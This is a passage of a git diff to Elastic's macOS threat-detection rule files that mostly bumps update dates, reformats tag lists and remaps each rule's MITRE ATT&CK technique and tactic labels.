= "https://attack.mitre.org/techniques/T1102/003/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml b/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml index cd1e4aa5a67..3777c19d34f 100644 --- a/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml +++ b/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,16 +85,10 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "destination.domain"] diff --git a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml index 9a0859fd9b0..33c46e2cb91 100644 --- a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml +++ b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -188,11 +188,15 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "destination.domain"] diff --git a/rules/macos/credential_access_high_volume_of_pbpaste.toml b/rules/macos/credential_access_high_volume_of_pbpaste.toml index 8cf8dad2102..91617be6e37 100644 --- a/rules/macos/credential_access_high_volume_of_pbpaste.toml +++ b/rules/macos/credential_access_high_volume_of_pbpaste.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["endpoint", "jamf_protect"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.investigate]] @@ -88,15 +88,7 @@ Jamf Protect is integrated into the Elastic Agent using Fleet. Upon configuratio - Click "Save and Continue". """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Jamf Protect", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Data Source: Jamf Protect", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -108,14 +100,13 @@ sequence by host.hostname, host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1056" -name = "Input Capture" -reference = "https://attack.mitre.org/techniques/T1056/" +[[rule.threat.technique]] +id = "T1115" +name = "Clipboard Data" +reference = "https://attack.mitre.org/techniques/T1115/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/credential_access_kerberosdump_kcc.toml b/rules/macos/credential_access_kerberosdump_kcc.toml index e566cdb00e5..793106b873c 100644 --- a/rules/macos/credential_access_kerberosdump_kcc.toml +++ b/rules/macos/credential_access_kerberosdump_kcc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,24 +101,18 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" -[[rule.threat.technique.subtechnique]] -id = "T1558.003" -name = "Kerberoasting" -reference = "https://attack.mitre.org/techniques/T1558/003/" - +[[rule.threat.technique.subtechnique]] +id = "T1558.005" +name = "Ccache Files" +reference = "https://attack.mitre.org/techniques/T1558/005/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml index d1bc68892c1..8fdfc554d3f 100644 --- a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml +++ b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,29 +107,18 @@ Keychain is macOS's secure storage system for managing user credentials, includi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" reference = "https://attack.mitre.org/techniques/T1555/001/" - -[[rule.threat.technique]] -id = "T1555" -name = "Credentials from Password Stores" -reference = "https://attack.mitre.org/techniques/T1555/" -[[rule.threat.technique.subtechnique]] -id = "T1555.003" -name = "Credentials from Web Browsers" -reference = "https://attack.mitre.org/techniques/T1555/003/" - - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_mitm_localhost_webproxy.toml b/rules/macos/credential_access_mitm_localhost_webproxy.toml index 356443d7e15..2090aa8ae6e 100644 --- a/rules/macos/credential_access_mitm_localhost_webproxy.toml +++ b/rules/macos/credential_access_mitm_localhost_webproxy.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,14 +103,13 @@ Web proxy settings in macOS manage how web traffic is routed, often used to enha [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1539" -name = "Steal Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1539/" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml index 24d5fa1fbd2..f6ff2838586 100644 --- a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml +++ b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,14 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -112,19 +105,36 @@ OSASCRIPT is a macOS utility that allows the execution of AppleScript and other [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1056" name = "Input Capture" reference = "https://attack.mitre.org/techniques/T1056/" + [[rule.threat.technique.subtechnique]] id = "T1056.002" name = "GUI Input Capture" reference = "https://attack.mitre.org/techniques/T1056/002/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml index 26ee109c54d..8cdf00243f1 100644 --- a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml +++ b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,10 +73,32 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" @@ -86,7 +108,6 @@ reference = "https://attack.mitre.org/techniques/T1555/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.path"] diff --git a/rules/macos/defense_evasion_apple_softupdates_modification.toml b/rules/macos/defense_evasion_apple_softupdates_modification.toml index 744d460b16f..a69bb661f7e 100644 --- a/rules/macos/defense_evasion_apple_softupdates_modification.toml +++ b/rules/macos/defense_evasion_apple_softupdates_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/15" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -99,19 +99,13 @@ In macOS environments, the SoftwareUpdate preferences manage system updates, cru [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml index 2a5331cde71..6a0a3ddec4b 100644 --- a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml +++ b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,19 +107,18 @@ In macOS, files downloaded from the internet are tagged with a quarantine attrib [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml index d56533056a0..83062f06243 100644 --- a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml +++ b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,14 +102,18 @@ Gatekeeper is a macOS security feature that ensures only trusted software runs b [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml index 026222507de..2ae593decbf 100644 --- a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml +++ b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,27 +76,17 @@ configuration where host.os.type == "macos" and event.action == "gatekeeper_over [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" - [[rule.threat.technique]] - name = "Impair Defenses" - id = "T1562" - reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" - [[rule.threat.technique.subtechnique]] - name = "Disable or Modify Tools" - id = "T1562.001" - reference = "https://attack.mitre.org/techniques/T1562/001/" - - [[rule.threat.technique]] - name = "Subvert Trust Controls" - id = "T1553" - reference = "https://attack.mitre.org/techniques/T1553/" - - [[rule.threat.technique.subtechnique]] - name = "Gatekeeper Bypass" - id = "T1553.001" - reference = "https://attack.mitre.org/techniques/T1553/001/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/macos/defense_evasion_modify_environment_launchctl.toml b/rules/macos/defense_evasion_modify_environment_launchctl.toml index cc25b452be3..b3b64c7f9f5 100644 --- a/rules/macos/defense_evasion_modify_environment_launchctl.toml +++ b/rules/macos/defense_evasion_modify_environment_launchctl.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,14 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -102,19 +95,26 @@ Environment variables in macOS are crucial for configuring system and applicatio [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.007" -name = "Path Interception by PATH Environment Variable" -reference = "https://attack.mitre.org/techniques/T1574/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml index 142f83f0d06..45222ba8d1c 100644 --- a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml +++ b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -49,14 +49,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -104,19 +97,36 @@ The Transparency, Consent, and Control (TCC) database in macOS manages app permi [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml index edcdf2e9347..001273f0e01 100644 --- a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml +++ b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,15 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -105,26 +97,31 @@ Secure Copy Protocol (SCP) is used for secure file transfers over SSH. On macOS, [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/macos/defense_evasion_safari_config_change.toml b/rules/macos/defense_evasion_safari_config_change.toml index 4a35cd07257..e7344238f35 100644 --- a/rules/macos/defense_evasion_safari_config_change.toml +++ b/rules/macos/defense_evasion_safari_config_change.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,19 +100,13 @@ The 'defaults' command in macOS is a utility that allows users to read, write, a [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique]] +id = "T1647" +name = "Plist File Modification" +reference = "https://attack.mitre.org/techniques/T1647/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml index 308e0584ee7..0108bed8fc5 100644 --- a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml +++ b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,14 +101,13 @@ Microsoft Office applications on macOS operate within a sandbox to limit potenti [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1497" -name = "Virtualization/Sandbox Evasion" -reference = "https://attack.mitre.org/techniques/T1497/" +[[rule.threat.technique]] +id = "T1211" +name = "Exploitation for Defense Evasion" +reference = "https://attack.mitre.org/techniques/T1211/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml index 03d0581f379..8e521ac1de8 100644 --- a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml +++ b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -18,15 +18,7 @@ name = "Suspicious TCC Access Granted for User Folders" risk_score = 73 rule_id = "ffd8b5e9-aa63-42b3-aead-6fdb170da9a3" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Collection", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "esql" note = """## Triage and analysis @@ -85,30 +77,48 @@ FROM logs-endpoint.events.* [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" - [[rule.threat.technique]] - name = "Abuse Elevation Control Mechanism" - id = "T1548" - reference = "https://attack.mitre.org/techniques/T1548/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" - [[rule.threat.technique.subtechnique]] - name = "TCC Manipulation" - id = "T1548.006" - reference = "https://attack.mitre.org/techniques/T1548/006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Collection" - id = "TA0009" - reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" - [[rule.threat.technique]] - name = "Data from Local System" - id = "T1005" - reference = "https://attack.mitre.org/techniques/T1005/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml index 11135c5720e..4a94c88a37e 100644 --- a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml +++ b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,36 +93,18 @@ Elastic Endpoint Security's kernel extension is crucial for monitoring and prote [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/discovery_full_disk_access_check.toml b/rules/macos/discovery_full_disk_access_check.toml index 58b259b52dd..02e5c37b70d 100644 --- a/rules/macos/discovery_full_disk_access_check.toml +++ b/rules/macos/discovery_full_disk_access_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -72,30 +72,12 @@ file where host.os.type == "macos" and event.action == "open" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" - [[rule.threat.technique]] - name = "File and Directory Discovery" - id = "T1083" - reference = "https://attack.mitre.org/techniques/T1083/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" - - [[rule.threat.technique]] - name = "Abuse Elevation Control Mechanism" - id = 